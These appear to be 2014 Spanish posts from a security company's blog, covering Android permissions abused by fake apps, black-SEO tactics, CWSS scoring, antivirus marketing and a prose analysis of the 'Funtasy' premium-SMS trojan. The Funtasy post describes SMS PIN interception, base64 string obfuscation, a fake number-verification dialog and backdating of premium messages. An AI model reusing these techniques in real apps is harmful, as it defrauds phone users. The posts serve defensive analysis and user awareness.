¿Qué ocurre si se instalan en un terminal aplicaciones de este tipo? Depende. Existen también varios tipos de "impacto" que pueden tener las apps falsas o el adware agresivo en general sobre el dispositivo, dependiendo de cómo han sido ideadas por los atacantes. Puede que se trate simplemente de publicidad agresiva, o puede que permitan realizar acciones mucho más peligrosas sin permiso del usuario. Y normalmente esto depende de sus permisos. Veamos qué significan los permisos en realidad y algunas posibilidades. Obviamente, las apps que requieren más permisos, podrían llegar a tomar cierto control sobre el dispositivo, y espiar al usuario. Un ejemplo claro son las aplicaciones falsas que pueden activar el micrófono y grabar sonido. Si en su lógica añaden rutinas de activación remota y envío de resultados a un servidor, se hablaría de la posibilidad de espiar conversaciones. En realidad, no es algo en lo que los atacantes estén especialmente interesados. Pero sí pueden llegar a estarlo en la lectura de SMS, por ejemplo, porque en España es posible una estafa que ya hemos descrito anteriormente. Clash of Clans falso cuando ni siquiera existía el oficial en Google Play Aunque es cierto que la mayoría de FakeApps intentan simplemente cobrar su cuota por instalación o por bombardeo de anuncios. Y para conseguirlo, muchas se bastan con el acceso a internet para mostrar publicidad. Si además la app se inicia automáticamente con el teléfono, puede que no sea necesario arrancarla explícitamente para verse constantemente invadido por la publicidad. La verdadera importancia de los permisos Algunos permisos en Android no se entienden bien. Otros, son más potentes de lo que pudiera parecer. La inmensa mayoría, son ignorados por los usuarios. Veamos los más peligrosos o confusos y cómo los usan los atacantes: Un wallpaper que permite realizar fotografías y vídeos además de modificar el historial entre otros permisos agresivos SEND_SMS: Obviamente, permite a la aplicación enviar SMS, sin la validación explícita del usuario. No es un permiso que ofrezca mucha confianza. El desarrollador podría requerir el permiso a través de un intent, y entonces el usuario tendría que validar cada intento, pero si se declara en el manifiesto explícitamente, la app puede mandar en segundo plano SMS sin ninguna interacción. El peligro que conlleva está relacionado con la suscripción a los servicios premium y el gasto que esto supone. READ_PHONE_STATE: Leer ID y estado del teléfono. Su uso suele ser legítimo. Por ejemplo, si se quiere poner en pausa una app cuando se recibe una llamada, la app debe tener este permiso. Algo cómo para los juegos. El problema es que esta "lectura del estado" también viene asociada con el acceso a información sensible, como el IMEI, IMSI (identificador tarjeta SIM) y al identificador único que Google asigna a cada terminal. En las primeras versiones este permiso ni siquiera tenía que ser solicitado. Por tanto, resulta complicado decidir si su uso es legítimo o no. WRITE_EXTERNAL_STORAGE: Permite alterar o borrar archivos en la memoria del dispositivo. El problema es que con él, se podrían ver los archivos del resto de apps. READ_EXTERNAL_STORAGE: Aunque pareciera implícito en el anterior, este permiso se introdujo en la versión 4.1. En versiones anteriores todas las aplicaciones pueden leer en la memoria externa. Útil para el robo de base de datos de WhatsApp, por ejemplo. ACCESS_COARSE_LOCATION: Este permiso da a la app la posibilidad de ubicar al usuario sin GPS (el posicionamiento por Wi-Fi que realiza Google, y la de celdas propia de la telefonía). Dependiendo de dónde se use ofrece una precisión similar al GPS. ACCESS_FINE_LOCATION: Localización GPS. Al otorgar este permiso permitimos también el anterior. Se suele utilizar para ofrecer una publicidad más eficaz, basada en el país, región, etc. READ_CONTACTS: Permite leer información sobre los contactos almacenados (nombres, correos electrónicos, números de teléfono). Muchas empresas de supuesta mercadotecnia, roban esta información para almacenarla en su base de datos y traficar con ella. WAKE_LOCK: Permite a las apps decirle al teléfono que no debe entrar en modo suspensión. Por ejemplo, podría ser usado en el malware que mina bitcoins. Plants Vs. Zombies 2 falso (con apenas 200 kilobytes) que necesita acceder al micrófono Es complicado aconsejar sobre los permisos que realmente pueden resultar peligrosos o no. Evidentemente, todo acceso a Internet puede resultar peligroso, pero... ¿qué app no lo requiere hoy en día? Cualquier app quiere monetizar su inversión con publicidad legítima (banners controlados y respetuosos con la experiencia de usuario) y esta publicidad necesita conexión a internet. Por tanto, solicitar ese permiso no indica nada sobre la legitimidad de una aplicación. También puede ocurrir que una app declare que necesita ciertos permisos, pero eso no implica que los utilice en su código. Por ejemplo, puede que los haya declarado por otras razones: Su SDK de publicidad se lo recomienda porque es la librería de publicidad la que lo necesita, no el código de la aplicación. No tiene la intención de usarlo en esa versión, pero sí en posteriores. Una app puede actualizarse automáticamente si no aumenta los permisos en la versión siguiente y está firmada por el mismo certificado. Si se añade algún permiso, la actualización debe ser aprobada explícitamente por el usuario. Puede que algunos atacantes prefieran declarar ciertos permisos en una primera versión aunque no los usen, levantando así menos sospechas. Luego podrían actualizarse automáticamente y ahora sí, hacer uso de ellos. Juego totalmente falso, pero que puede acceder a información sensible Otros permisos, quizás sí son mucho más agresivos, y pueden hacer sospechar directamente: RECEIVE_BOOT_COMPLETED: Permite a la app permanecer a la escucha de cuándo se ha encendido el teléfono y actuar en consecuencia. Sería el equivalente a anclarse en alguno de los puntos de inicio del sistema. INSTALL_SHORTCUT: Instalar accesos directos en la pantalla de inicio a otras stores "menos controladas" o a otras apps, es una práctica habitual del adware y malware en general. En el mundo del escritorio, sería quizás el equivalente a insertar en favoritos un enlace. WRITE_SETTINGS: Debe haber un buen motivo para modificar la configuración del dispositivo. SYSTEM_ALERT_WINDOW: Fundamentalmente, permite mostrarse sobre cualquier otra aplicación en el teléfono, tapando al resto y, por tanto, mostrando la publicidad más agresiva posible. TubeMate (aplicación legítima expulsada de Google Play) falso con permisos para enviar SMS Pero esto no es una guía completa de permisos, ni existe una regla fija que permita hacer sospechar. Solo en los casos más extremos (supuestos libros que requieran envío de SMS, fondos de escritorio con capacidad de grabar con el micrófono...) es posible que pueda descartarse directamente la app. Ni siquiera el sobrevalorado sentido común sirve en estos casos. Muchas aplicaciones que contienen adware, se disfrazan de utilidades que (de ser legítimas), necesitarían estos permisos. Por tanto incluso los usuarios más avispados podrían llegar a ser víctima de estos fakes si solo sospechen de los permisos. Deben ser revisados, sí, pero también comparados con muchos otros factores. Y eso es complicado. Aunque no lo parezca, este WhatsApp es falso, y requiere menos permisos que el original * El negocio de las "FakeApps" y el malware en Google Play (I): Introducción * El negocio de las "FakeApps" y el malware en Google Play (II): Tipos de "fakes" * El negocio de las "FakeApps" y el malware en Google Play (III): Estrategias * El negocio de las "FakeApps" y el malware en Google Play (IV): Política y rentabilidad * El negocio de las "FakeApps" y el malware en Google Play (V): Limpieza automática * El negocio de las "FakeApps" y el malware en Google Play (VI): Limpieza "manual" * El negocio de las "FakeApps" y el malware en Google Play (VII): Cómo llegan a las víctimas * El negocio de las "FakeApps" y el malware en Google Play (VIII): Permisos en las apps * El negocio de las "FakeApps" y el malware en Google Play (IX): ¿Qué hacen y cómo se programan las apps? Sergio de los Santos ssantos@11paths.com @ssantosv
2 de junio de 2014
Malware español en Google Play, nuevas técnicas: Análisis de Funtasy
Ya se ha hablado en alguna ocasión del tipo de malware alojado en Google Play que suscribe a la víctima automáticamente a servicios de SMS premium. Pero sigue ocurriendo más y mejor. Hemos detectado cómo las estafas han evolucionado y el malware utiliza nuevas técnicas interesantes para ser más efectivo. Ya sabemos de estafadores que intentan hacer pagar 5 euros por un enlace a la descarga oficial de Flash para Android. También, de la estafa de la suscripción automática a los mensajes SMS premium. Se basa en eludir el hecho de que los mensajes premium necesitan confirmación por parte del usuario. Habitualmente, al enviar el ALTA al número correspondiente, el servicio debe devolver un PIN de verificación que el usuario devuelve por SMS. Esto demuestra que quiere realmente suscribirse al servicio y es consciente. El malware de este tipo, recibe ese SMS de confirmación, extrae automáticamente la cadena exacta del PIN de confirmación del SMS, y envía la suscripción a través de un sistema de alta web. Todo de forma transparente para el usuario. Trozo de código que toma el PIN de confirmación de un SMS Nuevas muestras Las nuevas muestras de las que hablamos ahora han aparecido durante el mes de abril y en algunos casos se han mantenido hasta un mes en Google Play. Estas variantes no han sido cazadas por los motores antivirus hasta mediados de mayo, habitualmente con el nombre Funtasy. Durante este tiempo, el atacante ha adoptado varias personalidades diferentes pero ha mantenido la temática de los programas falsos. Las apps con el código malicioso o bien son en realidad animaciones inútiles o ventanas de navegador a páginas web que, en formato especial para la pantalla del móvil o tableta, muestran texto. En segundo plano, su lógica realiza la suscripción automática. Aunque en esta investigación se habla de algunas apps y developers, en realidad el atacante ha operado durante al menos dos meses bajo diferentes developers: AppMax, bestapps2014, Milapps101, Milapps102 y fun apps con muchas aplicaciones diferentes. Diferentes apps y perfiles del atacante ¿Por qué Funtasy? Es el nombre de la empresa y el dominio con el que comunica el troyano para enviar la suscripción sin consentimiento explícito. Ahí se observa que la empresa FUNTASY MOBILE S.L, fundada en febrero y con sede en el centro de Málaga bajo "Oscar Sánchez" como administrador único (también lo es de otras tantas compañías, algunas desaparecidas) es la responsable. Ampliando horizontes y mejorando En otras versiones de este tipo de programas, la estafa solo funcionaba con teléfonos Vodafone. Ahora se amplía a muchos otros operadores. Incluso australianos (aunque detecta que pertenezca a ese país, más tarde no tiene ningún efecto sobre un teléfono de allí). El troyano busca el código de operador, si coincide con el español o australiano, activa la estafa. Luego solo puede suscribirse a operadores españoles. Otra mejora introducida es que oculta las cadenas de texto incrustadas en el código. Están ofuscadas en base64, intentando pasar desapercibidas. Los números de teléfono, términos de uso, etc., todo está codificado. Además, dependiendo de la muestra analizada, el código es de muy mala calidad. Hay zonas a las que nunca se llega, y todo parece estar en modo "debug" como pruebas realizadas por el programador. Constantes del programa Estrategias interesantes Las apps no pueden acceder por política al número de la tarjeta SIM directamente, así que usan programas como whatsapp para averiguarlo. También se usa Telegram. Algo novedoso en este caso es que, si la víctima no dispone de esos programas, el troyano sigue intentándolo. Llama a getLine1Number(), busca en los logs de llamadas, luego en las apps mencionadas... y si aun así no lo consigue, muestra un diálogo amenazante para que sea la víctima la que introduzca su propio número de teléfono. El diálogo enseña la foto de perfil del usuario del teléfono (si no se tiene, muestra una imagen típica de Whatsapp) con el siguiente texto: Verifica tu número de teléfono: Se ha intentado iniciar sesión desde otro terminal, por seguridad debes introducir tu número de teléfono asociado Además lo hace en otros idiomas según la configuración del teléfono. Otra función interesante con la que el programador estaba experimentando, es supeditar la estafa a la presencia o no de ciertas apps legítimas relacionadas con SMS como Go Pro SMS, Handcent SMS, Secure SMS... Si la víctima usa estos programas (que también interceptan los SMS entrantes) la estrategia debía ser diferente. Pero la función está claramente mal programada. Aunque parece que en otras versiones, funciona correctamente. Para evitar ser descubierto a través de los mensajes no solicitados, el malware realiza otro truco muy ingenioso. Intercepta los mensajes SMS antes de ser recibidos por el usuario, silencia el teléfono, y les cambia la fecha a 15 días antes. Así se hunde en la bandeja de entrada de SMS y la víctima tardará aún más en saber que le están llegando mensajes premium. Código que modifica la fecha de los mensajes entrantes, retrasándola 15 días. También silencia la entrada de estos SMS Todas las gestiones se realizan a través de esta web, evitando el envío directo a servicios premiun Errores de bulto Sin embargo también ha cometido errores. El autor de la aplicación ha usado su nombre real no solo para registrar los dominios de las URL, sino que también se deduce su nombre del correo para el registro de developer en Google Play. Incluso ha comentado positivamente sus propias apps con su cuenta real. También, en ocasiones el inglés utilizado para darle internacionalidad deja mucho que desear. Comentaba con su nombre real sus apps con valoración positiva En vez de "brean" debería decir "brand" En la descripción de las apps, en ningún momento se advierte explícitamente que los programas no son más que animaciones o bromas y que no funcionan como se podría esperar. Tampoco que con su utilización se consiente la suscripción a servicios de este tipo. En este sentido, el programa muestra claramente un mensaje nada más ser arrancado: Servicio de suscripción para usuarios Movistar, Vodafone, Orange, Yoigo, R y Simyo para mayores de edad o menores con capacidad legal para contratar, prestados por (FUNTASY MOBILE S.L., operador titular ARGATEL SOLUTIONS SL, n. atención al cliente 902 303 803 ó inf@argatel.com, apartado de correos 167, 17001 Girona. Coste por SMS recibido 1.46 euros/sms (IVA incluido) más el coste de navegación WAP, que dependerá del operador que tenga contratado. Máximo 10 sms/semana. El límite máximo de facturación del servicio puede variar en función de tu operador (18 a 30 euros/mes). Baja automática para cancelar el servicio: envía BAJA al 797977. Pero no espera a aceptar estos los términos de uso (en realidad ya está funcionando cuando los enseña), los muestra durante muy poco tiempo y con letra pequeña. Sergio de los Santos ssantos@11paths.com @ssantosv
26 de mayo de 2014
Ocho siglas relacionadas con las vulnerabilidades (IV): CWSS
Como el resto de métricas que estamos observando en esta serie, CWSS (Common Weakness Scoring System) también es un sistema de valoración que se encarga de parametrizar la criticidad de las debilidades de software. También fue creado por el MITRE como parte del proyecto CWE. CWSS ofrece un mecanismo estandarizado que permite evaluar (de manera objetiva y a nivel de desarrollo) las posibles debilidades típicas que puedan estar presentes en el software por su naturaleza y pudieran convertirse en una vulnerabilidad con posibilidades de ser explotada. Por ejemplo, si una aplicación web que almacene información en una base de datos SQL no gestionara correctamente las entradas recibidas por la aplicación (esta sería la debilidad) sería posible aprovechar algún tipo de inyección SQL (vulnerabilidad) para obtener información sensible. Al tratarse de una vulnerabilidad "típica" en este tipo de sistemas, conviene parametrizarla para poder darle una prioridad a su estudio y en resumen, una mejor gestión. Basándose en este sistema de valoración se pretende ayudar a la toma de decisiones relacionadas con las prioridades de estas debilidades. En la práctica, esto puede ser utilizado para alertar a los consumidores y empresas creadoras de software acerca de los fallos más típicos y críticos que existen en la actualidad, permitiendo que sean capaces de tener una referencia en cuanto a los requerimientos que debe cumplir el software que contraten o desarrollen según sea el caso. También, priorizar el desarrollo interno en un grupo de programadores. Una diferencia con respecto a las iniciativas ya comentadas en entradas anteriores, es que no existe una web, servicio o aplicación conocida que en realidad utilice este sistema para valorar las debilidades públicamente, tal y como se hace comúnmente con, por ejemplo, el CVSS. En sus inicios, este sistema se solía promover a través de publicaciones (como por ejemplo los documentos desarrollados entre el MITRE y SANS Institute del tipo Top 25 Most Dangerous Software Errors), sin embargo, en la actualidad es difícil encontrar información reciente asociada a debilidades de software. Puede deberse a que hoy por hoy la lista CWE (Common Weakness Enumeration) se actualiza muy poco. Además, las empresas de desarrollo de software protegen el código de sus aplicaciones y su estudio, valoración y resolución se suele gestionar de manera privada sin compartir la información. Objetivos y funciones Está patrocinado por el Software Assurance program de la oficina de ciberseguridad y comunicaciones del U.S. Department of Homeland Security (DHS). En la web de este proyecto, definen una serie funciones que pueden cumplir el CWSS, entre las que destacan: Proporcionar un estándar que puede ser utilizado para priorizar errores descubiertos en el software que afecten a la seguridad de estos, y utilizados por desarrolladores para priorizar las soluciones que deben implementarse según la criticidad de estos fallos. Proporcionar una medida cuantitativa de las debilidades no solucionadas que pueden encontrarse en el software. Puede ser utilizado por los consumidores para identificar las debilidades más importantes que afectan a sus dominios de negocio, e informar acerca de las actividades de protección necesarios para garantizar la calidad del software que estos necesitan. Al igual que el CVSS, este sistema de valoración agrupa en tres grupos de métricas los distintos factores que estudia relacionados a las debilidades del software. En este caso son 18 factores los que se encargan de definir el valor de estas métricas. Base Finding Se encarga de estudiar el riesgo inherente a la debilidad, la fiabilidad del descubrimiento y fortaleza de los controles. Como puede observarse en la imagen anterior, los factores en esta métrica van relacionados directamente con las características de la debilidad encontrada. Entre estas características se encuentran: Technical Impact: Este es el posible impacto que pueda generar la debilidad en caso de que pueda ser aprovechada para explotar una vulnerabilidad. Al igual que en el CVSS estas se evalúan en base a cómo puede verse afectado el software en cuanto a confidencialidad, integridad y la disponibilidad se refiere. Acquired Privilege: Este se refiere al tipo de privilegios que puede obtener un atacante que logre explotar la debilidad. Acquired Privilege Layer: Se encarga de definir el entorno al que pudiera tener acceso un atacante en caso explotar la debilidad y de obtener los privilegios mencionados en el factor anterior. Internal Control Effectiveness: Hace referencia a los posibles mecanismos de protección o mitigación implementados de forma explícita en el código para evitar que sea vulnerado el software a través de esta debilidad. Con esta característica se busca medir la efectividad que tienen estos mecanismos de controlar la debilidad para que un atacante no pueda explotarla. Finding Confidence: Este determina el nivel de certidumbre que se tiene acerca de que lo reportado es una debilidad explotable, y si de verdad el atacante puede aprovecharla para explotar una vulnerabilidad. Attack Surface Como puede observarse en la imagen anterior, los factores de esta métrica guardan relación con las barreras que un atacante necesite atravesar para poder aprovechar el fallo y explotar una vulnerabilidad. Entre estas características se encuentran: Required Privilege: Identifica el tipo de privilegio necesario que se debe tener para poder acceder a la funcionalidad que contiene la debilidad (usuario regular, invitado, ninguno, administrador, privilegios especiales, etc.). Required Privilege Layer: Detalla la capa de operaciones (sistema, aplicación, red, etc.) que se debe acceder en caso de que la debilidad pueda ser explotada. Access Vector (AV): Reseña el canal (Internet, Intranet, acceso local, etc.) a través del que se puede alcanzar la debilidad. Authentication Strength: Este mide la fortaleza (alta, moderada, baja, ninguna, etc.) de la rutina de autenticación que protege la funcionalidad que contiene la debilidad. Authentication Instances: Establece el número de autenticaciones que deben hacerse antes de poder acceder a la debilidad. Level of Interaction: Determina el nivel de interacciones necesarias por parte de la víctima para que un ataque que se aproveche de la debilidad pueda tener lugar. Deployment Scope: Identifica si la debilidad está presente en todas las versiones e instancias de despliegue del software, o si solo afecta a un subconjunto de plataformas o configuraciones específicas. Environmental Contiene todos los factores que pueden ser específicos a un contexto operacional concreto como podría ser el impacto en el negocio, la probabilidad de explotación o la existencia de controles externos. Business Impact: Describe el impacto potencial que puede sufrir el servicio si la debilidad fuera explotada. Likelihood of Discovery: Establece la probabilidad (alta, media, baja, etc.) de que un atacante descubra la debilidad. Likelihood of Exploit: Define la probabilidad de que un atacante con los privilegios y/o autenticación necesarios sea capaz d explotar la debilidad una vez la haya encontrado. External Control Effectiveness: Hace referencia a la capacidad que tienen los controles o medidas de mitigación (externos a la aplicación) que eviten que una debilidad pueda ser aprovechada. Remediation Effort: Es la cantidad de esfuerzo necesario para remediar la debilidad de manera que esta ya no comprometa la seguridad del software. Prevalence: Identifica la frecuencia con que la debilidad se suele encontrar en el software en general. Aunque esta métrica no sea tan reconocida y utilizada como otras mencionadas, sí que son muy útiles entre grupos de desarrollo para la organización y priorización de tareas a lo largo del ciclo de vida de desarrollo del software. En siguientes entradas hablaremos de otras dos siglas relacionadas con el ámbito de las debilidades y vulnerabilidades: CVRF y CWRAF. * Ocho siglas relacionadas con las vulnerabilidades (I): CVE * Ocho siglas relacionadas con las vulnerabilidades (II): CWE y CAPEC * Ocho siglas relacionadas con las vulnerabilidades (III): CVSS Umberto Schiavo umberto.schiavo@11paths.com
23 de mayo de 2014
Algunos detalles técnicos sobre el front-end de FaasT
FaasT se ha convertido en un proyecto de gran magnitud, tanto en su back-end (bases de datos, servidores, procesos, informes, consumidores, hilos...) como en su interfaz web. Hablaremos de qué herramientas y librerías se están utilizando para implementarla y, además, un esbozo de cómo se está organizando el código. Existen muchas guías de buenas prácticas y diferentes formas de organizar código, todas válidas y aceptadas. Para FaasT se ha utilizado una de ellas, que se ha considerado adecuada. No tiene por qué ser la mejor para todos los proyectos, pero sí que la estrategia adoptada está mostrándose útil en un entorno de un trabajo de gran magnitud donde colaboran diferentes programadores con perfiles dispares. Reglas importantes Un proyecto de front-end como FaasT no lo crea una sola persona. Es necesario pensar como equipo desde un primer momento y eso conlleva respetar algunas normas. Por ejemplo: Código modular: Algo que aplica a cualquier proyecto de programación es que en la medida de lo posible hay que hacer el código tan modular como se pueda, para que a la hora de tener que hacer un cambio, se agilice la búsqueda de la zona afectada. Otra ventaja es que si se quiere añadir nueva funcionalidad siempre es más sencillo si todo está separado en bloques con funcionalidad específica. Comentarios: En cualquier código con lógica debe haber comentarios explicando funciones o métodos que no sean muy obvios, tanto pensando en otras personas que puedan leer el código, como para el propio autor que no debe confiar en exceso en su propia memoria. Los comentarios en HTML son tan útiles como los de código "tradicional", sobre todo porque obliga al grupo de trabajo a mantener una estructura dentro de un archivo. No es necesario insertar comentarios de HTML con <!—Mi comentario -->... muchos back-end permiten guardar comentarios con etiquetas suyas, que luego no se muestran al cliente ni en el código fuente que se envía. Así, se mantienen los comentarios como algo interno para desarrollo. Principio KISS: Un principio creado en la marina americana hace 50 años que significa: “Keep It Simple, Stupid”. El proyecto es muy grande. Tal vez, que una persona invierta tiempo en conseguir un trozo de código más simple, puede significar que otras personas del equipo luego puedan continuar el hilo sin perder mucho más tiempo en documentación. Las tres reglas tienen un obvio factor en común: si se es parte de un equipo, se ha de trabajar en equipo. Front-end FaasT depende de muchas librerías, plugins de JavaScript, reglas de CSS, etc. Organizar todos estos archivos que componen la interfaz web en carpetas puede resultar complicado. Para solucionarlo, se ha usado HTML5 Boilerplate. Se trata de una plantilla de front-end para hacer páginas web siguiendo los estándares de HTML5 y con una serie de plugins y archivos por defecto que, aunque obviamente pueden ser modificados, proporcionan una muy buena base para empezar el front-end de cualquier proyecto web. Directorios Cómo se estructuran los directorios es algo que no solo ayuda a llevar una buena organización del código que nos pueda ser útil, sino que también facilita la vida al resto de programadores. La estructura usada en FaasT está basada en la que ofrece HTML5 Boilerplate con unas pequeñas modificaciones (como la carpeta de archivos less). Estructura de directorios en FaasT Esta jerarquía de documentos es muy sencilla de entender a simple vista y salvo el cambio de directorio que almacena archivos .less que se explicará brevemente, el resto está todo en la documentación de HTML5 Boilerplate. CSS y LESS Los archivos CSS de un proyecto web no reciben quizás la misma atención que por ejemplo los archivos JavaScript. Sin embargo, no por ello se deben dejar de seguir algunas buenas prácticas: Todas las reglas CSS deben encontrarse en archivos específicos. No es buena idea tener reglas CSS dentro de etiquetas en el propio HTML, o como reglas dentro del elemento al que se le aplica el estilo. !important no se debe usar más que en caso de emergencia. Si se debe forzar una regla CSS, es que algo se está haciendo mal. JavaScript Igual que con las reglas de CSS, la lógica que se le ponga al front-end no debe encontrarse ni en etiquetas de [script] ni como parte del elemento al que se refiere. Deben encontrarse en un archivo .js aparte. No respetar esta regla puede suponer un gran problema para depurar código JavaScript (cosa ya relativamente complicada de por sí). En FaasT, como en tantos otros proyectos, usamos librerías externas que se referencian vía CDN pero de las que también disponemos de un fallback local en caso de caída del CDN. Estas librerías están todas almacenadas separadas del resto de archivos .js en la carpeta "vendor", así no se mezclan archivos nuestros con librerías. Por ejemplo: Usabilidad y diseño Dicho lo anterior, en el proyecto se han elegido las siguientes librerías: Para Javascript: Jquery: fácil, versátil y con muchos plugins que se usan constantemente. Jquery UI, perfecto para extender la funcionalidad base y adaptarla a nuestras necesidades, para accordions, sliders y otros usos. Normalize.js: para resetear CSS Modernizr.js: para que navegadores antiguos puedan usar elementos de HTML5 y CSS3. Para CSS: Twitter Bootstrap: sobre todo por la comodidad de organizar los tamaños de los divs, también tiene un montón de elementos útiles como botones o glyphicons. Para la gestión de nuestros propios CSS hemos usado LESS, un lenguaje de hoja de estilos dinámico que permite el uso de variables para usar en colores, por ejemplo, acelerando y simplificando el posible cambio de estilos. Así no hace falta escribir un color cientos de veces como #F5F5F5, sino que cambiando la variable podemos modificar las cientos de veces que se llama a ese color. También proporciona otras pequeñas ventajas como reglas anidadas o extender clases. Todo esto luego se compila en archivos .less en .css que es lo que se le presenta al cliente. Juan Luis Sanz juanluis.sanz@11paths.com
14 de mayo de 2014
Agenda de la semana de Eleven Paths
El 13 de mayo, Chema Alonso participa en una conferencia abierta y gratuita con la organización RENATA de Bogotá. Organizada por Telefónica, Movistar, Eleven Paths y RENATA, la conferencia "La importancia de la seguridad digital" tendrá lugar el 13 de mayo de 2014 desde las 13:30 a las 15:00 horas. La retransmisión será en directo a través de RENATA en este enlace. El viernes de 16 de mayo, tendrá lugar en Madrid el acto central del Día Mundial de Internet en el Senado de España. Se trata de un debate plenario sobre "La Gobernanza de Internet: ¿Quién y Cómo se controla la red?" con motivo del Día Mundial de Internet, con la participación de Chema Alonso, CEO de Eleven Paths. Más información en este enlace. Por último, el sábado 17 de mayo se celebrarán en Madrid las jornadas X1REDMASSEGURA, cuyo objetivo es promover a través de un foro común el uso de Internet de una manera confiable y segura. Eleven Paths presentará la conferencia "Un pestillo a nuestra privacidad". Más información: http://www.x1redmassegura.com/
13 de mayo de 2014
La leyenda del antivirus muerto
Brian Dye, vice presidente de Symantec, anunció hace unos días que los antivirus "estaban muertos" y "condenados al fracaso". Sus palabras han tenido una importante repercusión en la industria, pero no deja de ser una maniobra de marketing con una explicación algo menos simplista que esa frase. Lo que ha dicho Que los antivirus no sirven para hacer ya tanto dinero, que su empresa ya no apuesta de esta forma por el producto, y que por tanto, está muerto. Como lo ha declarado una de las mayores empresas comercializadoras de antivirus del mundo, sus palabras son tomadas como una forma de matar al antivirus como sistema de seguridad, no al antivirus de Symantec como producto o una de sus múltiples líneas de trabajo en seguridad. También ha dicho que los antivirus solo detienen el 45% de los ataques actuales. Realmente, parece que se refería al motor de detección, puesto que los "antivirus" de usuario hoy en día, engloban toda una suite de seguridad con otras funcionalidades (sandboxes, antiphishing, gestores de identidades...). Esto sí merecería la pena comprarlo por ahora, decía Dye, como un todo. Después de estas declaraciones, anunciaba la nueva orientación de Symantec, concentrada en sus productos de seguridad como servicio, inteligencia, etc. Es un mercado donde parece que no tiene una fuerte presencia. Lógicamente, vender licencias de software es más rentable. Añadía que el mercado del malware "tradicional" se está reduciendo en favor de los ciberataques más sofisticados, denegaciones de servicio, ataques dirigidos, intrusión en redes... Lo que quería decir Un titular tan jugoso no se escapa. Se trata por tanto de una maniobra de marketing probablemente muy bien articulada que beneficia a la compañía. Quieren dar un volantazo hacia otros modelos de negocio. Un titular como este les ayuda a implantar en la conciencia colectiva (futuros clientes), que es necesario contratar otros servicios como los que justo ellos van a comercializar. Las consecuencias Sin embargo, el efecto colateral de esta declaración es que Symantec, desde su posición de "grande" en el mundo de los antivirus, perjudica al resto de actores que todavía quieren centrar sus esfuerzos en los motores antivirus. Es cierto que en el escritorio, los antivirus no son solo motores y que la detección (por firmas, heurísticas o en cloud) es una tecnología cada vez con menor éxito, pero los antivirus hace tiempo que evitan llamarse así. Ya hace mucho que se "reinventaron" en forma de suites de seguridad. Y esto, para los usuarios finales, es una herramienta todavía muy útil. Si bien no la primera medida de seguridad que deberían tomar, sí que esta "suite de seguridad" puede ayudarles a mantener un sistema mejor protegido, una vez la amenaza ha saltado el resto de prevenciones que se deberían aplicar. Es decir, el antivirus no está muerto en el escritorio, para el usuario podría ser una medida de seguridad más (no la primera en eficacia, desde luego). Quizás sí esté más moribundo en el entorno empresarial, donde los ataques serán dirigidos, y ahí, ni ahora ni nunca, tuvo nada que hacer el motor antivirus por sí solo. Ya se dijo desde Trend Micro en ese sentido alguna vez, que la industria antivirus apestaba (cuando Trend Micro estaba intentando vender que se trasladaba a la nube en 2008, y dejaba más de lado el modelo "tradicional" de antivirus). Artículo de Trend Micro en 2008. La industria AV apesta La afirmación del antivirus muerto se está repitiendo en la industria desde mediados de la década pasada. Siempre han sido conscientes de sus limitaciones (cuando trabajaban con firmas, por la propia naturaleza de las "listas negras"; cuando se volcaron en la heurística, por la aparición de los crypters...). Solo que ahora, verbalizarlo en frases simples y viniendo de quien viene, se manda un mensaje simple y contundente... aunque erróneo sin el contexto necesario. Tan erróneo, por otro lado, como el que han mandado las empresas antivirus también durante muchos años y hasta aproximadamente mediados de la década pasada, donde se hablaba de 100% de protección con la mera presencia de un antivirus en el sistema. Sergio de los Santos ssantos@11paths.com @ssantosv
12 de mayo de 2014
El negocio de las "FakeApps" y el malware en Google Play (VII): Cómo llegan a las víctimas
Seguimos observando las apps falsas en Google Play, cómo se comportan y cómo funciona este negocio. Si en la anterior entrada estudiamos qué estrategias manuales sigue Google Play para limpiar su store e intentar mitigar el problema, ahora veremos cómo llegan las FakeApps a los usuarios. Los atacantes necesitan posicionar las aplicaciones en Google Play "lo más alto posible" al igual que en en cualquier buscador. Por tanto, el SEO clásico y el menos convencional (el conocido como black SEO) también son técnicas válidas (aunque quizás menos estudiadas) en el market. Desde el punto de vista del atacante, es imprescindible aparecer en las búsquedas o apps relacionadas, para cazar al usuario despistado y ocasional. De esta forma las aplicaciones aparecerán muy cerca de la aplicación que desean suplantar, y los usuarios la descargarán más. Cada instalación, supone algunos céntimos en publicidad. Para conseguirlo, existen varias técnicas, basadas principalmente en la experiencia de cada desarrollador, puesto que no está documentada ninguna técnica que ofrezca mejores resultados. La verdadera popularidad alcanzada a través del mérito de la aplicación es la mejor, pero los atacantes manejan tiempos de semanas en el mejor de los casos, y no pueden esperar a que una app de mala calidad o que no es más que adware, se posicione en ese tiempo. Lo más habitual es aprovechar el nombre de aplicación que se quiere suplantar o con la que se quiere confundir además del texto explicación. La descripción de cada aplicación (el lugar donde se expone en qué consiste la app y las mejoras que incluye) permiten introducir cualquier tipo de texto. En él, los atacantes escriben todas las palabras que creen oportunas para que las víctimas lleguen a ellas. En este sentido, es muy parecido a las técnicas usadas con las páginas HTML y las keywords. Este es un ejemplo habitual que puede ocurrir en una descripción de Google Play. Una redacción llena de palabras sin sentido, que intenta que la app falsa aparezca cuando se buscan cualquiera de estas palabras. Google permite este tipo de descripciones caóticas y sin sentido. Se ha dado la situación en las que la aplicación falsa aparece sospechosamente "cerca" de la real, invitando a la confusión. Mostramos con imágenes, a continuación, algunos ejemplos de resultados de búsquedas. En esta imagen observamos hasta cuatro Minecraft falsos en las primeras posiciones de búsqueda El falso Top Eleven aparece en cuarta posición Si los grupos actúan a la vez, la búsqueda puede mostrar muchas apps falsas. Esta es una imagen tomada a principios de octubre de 2013 (un día especialmente complicado con muchas aplicaciones falsas), en el que una búsqueda del juego "Clash of clans" devolvía lo siguiente (las apps falsas están rodeadas con un círculo rojo). En rojo, las apps con iconos idénticos a otras, pero totalmente falsas que contienen adware o malware Desde diciembre de 2013, esta situación ya no se da de forma tan vistosa. Google Play modificó sus políticas, e impidió que dos aplicaciones compartiesen iconos sospechosamente parecidos. Igualmente, impedía el uso de un nombre exactamente igual a una app ya en el Store. Desde entonces, esta "contaminación" es mucho menos común, pero se han llegado a niveles preocupantes hasta al año pasado. Esto no significa que desde 2014 no existan FakeApps, sino que los atacantes han modificado sus hábitos. Ahora deben utilizar iconos de app más sutiles, o añadir palabras a los nombres originales para sortear las restricciones de Google. FakeApp de Clumsy Ninja, cuando todavía no estaba disponible para Android En resumen, la forma de llegar a las víctimas se basa en una buen parte de ingeniería social, y bastante de black SEO. * El negocio de las "FakeApps" y el malware en Google Play (I): Introducción * El negocio 